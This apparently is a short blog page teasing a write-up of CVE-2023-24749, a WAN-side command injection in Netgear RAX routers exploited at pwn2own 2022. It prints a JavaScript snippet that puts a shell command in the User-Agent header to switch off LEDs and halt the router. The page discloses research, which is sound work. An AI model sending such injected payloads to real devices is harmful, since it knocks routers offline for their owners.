so.cl

Rascals are always sociable, and the chief sign that a man has any nobility in his character is the little pleasure he takes in others company. Arthur Schopenhauer


A breakdown of a bug SEFCOM T0 and I exploited to achieve a WAN-side RCE in some Netgear RAX routers for pwn2own 2022. The bug is a remotely accessible command injection due to bad packet logging, cataloged as CVE-2023-24749. A One-Click WAN-side RCE in Netgear RAX Routers

Quote simple, one might add.

<script>
Object.defineProperty(navigator, 'userAgent', {
	get: function () { return 'TEST'; }
});
const xhr = new XMLHttpRequest()
xhr.open("GET", "/")
xhr.setRequestHeader("User-Agent", '"; ledCli ALLSW MSG_LED_ALL_SW_OFF; sleep 1; halt -f;"');
xhr.send()
</script>
March 8, 2023
#rce#vulnerability#hardware#router